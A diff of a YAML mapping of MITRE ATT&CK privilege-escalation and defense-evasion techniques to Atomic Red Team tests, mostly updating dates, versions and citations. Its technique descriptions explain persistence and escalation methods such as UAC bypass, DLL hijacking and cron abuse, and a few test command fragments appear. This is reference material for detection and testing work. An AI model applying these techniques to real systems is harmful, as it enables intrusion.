         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -17216,8 +17486,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -17265,7 +17533,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -17303,8 +17571,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -17353,7 +17619,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -17405,29 +17671,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -17474,7 +17739,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -17506,8 +17771,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -17521,6 +17786,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17533,11 +17802,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -17603,7 +17875,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -17692,7 +17963,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -17780,7 +18050,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -17865,7 +18134,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -17897,7 +18165,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -17920,11 +18188,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -17982,14 +18249,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -18090,7 +18356,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -18121,7 +18386,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -18155,8 +18420,6 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests:
     - name: Sudo usage
@@ -18204,7 +18467,7 @@ privilege-escalation:
           sudo visudo -c -f /etc/sudoers
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -18223,7 +18486,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -18237,7 +18499,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -18264,8 +18525,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -18296,12 +18557,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -18373,9 +18635,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -18391,12 +18653,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -18471,12 +18732,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -18496,9 +18756,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -18518,9 +18783,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -18537,6 +18801,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -18570,7 +18838,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -18726,31 +18993,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -18767,6 +19014,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -18777,9 +19025,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -18787,8 +19039,24 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -18853,7 +19121,7 @@ privilege-escalation:
           rm /etc/cron.weekly/#{cron_script_name} -f
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -18883,6 +19151,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -18893,6 +19162,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -18901,13 +19171,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18949,9 +19219,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -19019,19 +19286,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -19047,8 +19313,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -19062,7 +19328,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -19088,6 +19354,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -19115,12 +19385,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -19146,7 +19415,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -19188,7 +19457,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -19266,11 +19534,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -19350,7 +19617,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
